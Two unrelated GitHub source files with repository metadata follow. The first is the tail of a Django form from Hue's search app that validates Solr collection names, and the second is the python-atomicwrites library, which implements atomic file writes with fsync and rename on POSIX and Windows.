self.fields['fields'].choices = ((name, name) for name in fields)
class CollectionForm(forms.ModelForm):
class Meta:
model = Collection
exclude = ('facets', 'result', 'sorting', 'properties', 'cores')
def clean_name(self):
searcher = SearchController()
name = self.cleaned_data['name']
if not searcher.is_collection(name) and not searcher.is_core(name):
raise forms.ValidationError(_('No live Solr collection or core by the name %s') % name)
return name | {
"content_hash": "9d05c0bd2abfabb19207ff3172d24c04",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 170,
"avg_line_length": 47.735849056603776,
"alnum_prop": 0.7043478260869566,
"repo_name": "2013Commons/HUE-SHARK",
"id": "31593397b83ed5d53ac162a5b30d069e2fbc6ddb",
"size": "3323",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "apps/search/src/search/forms.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "207947"
},
{
"name": "C",
"bytes": "9992379"
},
{
"name": "C++",
"bytes": "199612"
},
{
"name": "CSS",
"bytes": "419753"
},
{
"name": "Emacs Lisp",
"bytes": "3171"
},
{
"name": "Java",
"bytes": "3683071"
},
{
"name": "JavaScript",
"bytes": "1076553"
},
{
"name": "Perl",
"bytes": "138710"
},
{
"name": "Python",
"bytes": "40522057"
},
{
"name": "SQL",
"bytes": "522"
},
{
"name": "Shell",
"bytes": "27739"
},
{
"name": "TeX",
"bytes": "126420"
},
{
"name": "XSLT",
"bytes": "190688"
}
],
"symlink_target": ""
} |
import contextlib
import io
import os
import sys
import tempfile
try:
import fcntl
except ImportError:
fcntl = None
# `fspath` was added in Python 3.6
try:
from os import fspath
except ImportError:
fspath = None
__version__ = '1.4.0'
PY2 = sys.version_info[0] == 2
text_type = unicode if PY2 else str # noqa
def _path_to_unicode(x):
if not isinstance(x, text_type):
return x.decode(sys.getfilesystemencoding())
return x
DEFAULT_MODE = "wb" if PY2 else "w"
_proper_fsync = os.fsync
if sys.platform != 'win32':
if hasattr(fcntl, 'F_FULLFSYNC'):
def _proper_fsync(fd):
# https://lists.apple.com/archives/darwin-dev/2005/Feb/msg00072.html
# https://developer.apple.com/library/mac/documentation/Darwin/Reference/ManPages/man2/fsync.2.html
# https://github.com/untitaker/python-atomicwrites/issues/6
fcntl.fcntl(fd, fcntl.F_FULLFSYNC)
def _sync_directory(directory):
# Ensure that filenames are written to disk
fd = os.open(directory, 0)
try:
_proper_fsync(fd)
finally:
os.close(fd)
def _replace_atomic(src, dst):
os.rename(src, dst)
_sync_directory(os.path.normpath(os.path.dirname(dst)))
def _move_atomic(src, dst):
os.link(src, dst)
os.unlink(src)
src_dir = os.path.normpath(os.path.dirname(src))
dst_dir = os.path.normpath(os.path.dirname(dst))
_sync_directory(dst_dir)
if src_dir != dst_dir:
_sync_directory(src_dir)
else:
from ctypes import windll, WinError
_MOVEFILE_REPLACE_EXISTING = 0x1
_MOVEFILE_WRITE_THROUGH = 0x8
_windows_default_flags = _MOVEFILE_WRITE_THROUGH
def _handle_errors(rv):
if not rv:
raise WinError()
def _replace_atomic(src, dst):
_handle_errors(windll.kernel32.MoveFileExW(
_path_to_unicode(src), _path_to_unicode(dst),
_windows_default_flags | _MOVEFILE_REPLACE_EXISTING
))
def _move_atomic(src, dst):
_handle_errors(windll.kernel32.MoveFileExW(
_path_to_unicode(src), _path_to_unicode(dst),
_windows_default_flags
))
def replace_atomic(src, dst):
'''
Move ``src`` to ``dst``. If ``dst`` exists, it will be silently
overwritten.
Both paths must reside on the same filesystem for the operation to be
atomic.
'''
return _replace_atomic(src, dst)
def move_atomic(src, dst):
'''
Move ``src`` to ``dst``. There might a timewindow where both filesystem
entries exist. If ``dst`` already exists, :py:exc:`FileExistsError` will be
raised.
Both paths must reside on the same filesystem for the operation to be
atomic.
'''
return _move_atomic(src, dst)
class AtomicWriter(object):
'''
A helper class for performing atomic writes. Usage::
with AtomicWriter(path).open() as f:
f.write(...)
:param path: The destination filepath. May or may not exist.
:param mode: The filemode for the temporary file. This defaults to `wb` in
Python 2 and `w` in Python 3.
:param overwrite: If set to false, an error is raised if ``path`` exists.
Errors are only raised after the file has been written to. Either way,
the operation is atomic.
:param open_kwargs: Keyword-arguments to pass to the underlying
:py:func:`open` call. This can be used to set the encoding when opening
files in text-mode.
If you need further control over the exact behavior, you are encouraged to
subclass.
'''
def __init__(self, path, mode=DEFAULT_MODE, overwrite=False,
**open_kwargs):
if 'a' in mode:
raise ValueError(
'Appending to an existing file is not supported, because that '
'would involve an expensive `copy`-operation to a temporary '
'file. Open the file in normal `w`-mode and copy explicitly '
'if that\'s what you\'re after.'
)
if 'x' in mode:
raise ValueError('Use the `overwrite`-parameter instead.')
if 'w' not in mode:
raise ValueError('AtomicWriters can only be written to.')
# Attempt to convert `path` to `str` or `bytes`
if fspath is not None:
path = fspath(path)
self._path = path
self._mode = mode
self._overwrite = overwrite
self._open_kwargs = open_kwargs
def open(self):
'''
Open the temporary file.
'''
return self._open(self.get_fileobject)
@contextlib.contextmanager
def _open(self, get_fileobject):
f = None # make sure f exists even if get_fileobject() fails
try:
success = False
with get_fileobject(**self._open_kwargs) as f:
yield f
self.sync(f)
self.commit(f)
success = True
finally:
if not success:
try:
self.rollback(f)
except Exception:
pass
def get_fileobject(self, suffix="", prefix=tempfile.gettempprefix(),
dir=None, **kwargs):
'''Return the temporary file to use.'''
if dir is None:
dir = os.path.normpath(os.path.dirname(self._path))
descriptor, name = tempfile.mkstemp(suffix=suffix, prefix=prefix,
dir=dir)
# io.open() will take either the descriptor or the name, but we need
# the name later for commit()/replace_atomic() and couldn't find a way
# to get the filename from the descriptor.
os.close(descriptor)
kwargs['mode'] = self._mode
kwargs['file'] = name
return io.open(**kwargs)
def sync(self, f):
'''responsible for clearing as many file caches as possible before
commit'''
f.flush()
_proper_fsync(f.fileno())
def commit(self, f):
'''Move the temporary file to the target location.'''
if self._overwrite:
replace_atomic(f.name, self._path)
else:
move_atomic(f.name, self._path)
def rollback(self, f):
'''Clean up all temporary resources.'''
os.unlink(f.name)
def atomic_write(path, writer_cls=AtomicWriter, **cls_kwargs):
'''
Simple atomic writes. This wraps :py:class:`AtomicWriter`::
with atomic_write(path) as f:
f.write(...)
:param path: The target path to write to.
:param writer_cls: The writer class to use. This parameter is useful if you
subclassed :py:class:`AtomicWriter` to change some behavior and want to
use that new subclass.
Additional keyword arguments are passed to the writer class. See
:py:class:`AtomicWriter`.
'''
return writer_cls(path, **cls_kwargs).open()
| {
"content_hash": "043c95c2f4cedc2641a35db7407125b1",
"timestamp": "",
"source": "github",
"line_count": 229,
"max_line_length": 111,
"avg_line_length": 30.436681222707424,
"alnum_prop": 0.5951219512195122,
"repo_name": "untitaker/python-atomicwrites",
"id": "0b9f92ab863bde9e146407956160091c094580ef",
"size": "6970",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "atomicwrites/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "65"
},
{
"name": "Python",
"bytes": "10986"
}
],
"symlink_target": ""
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.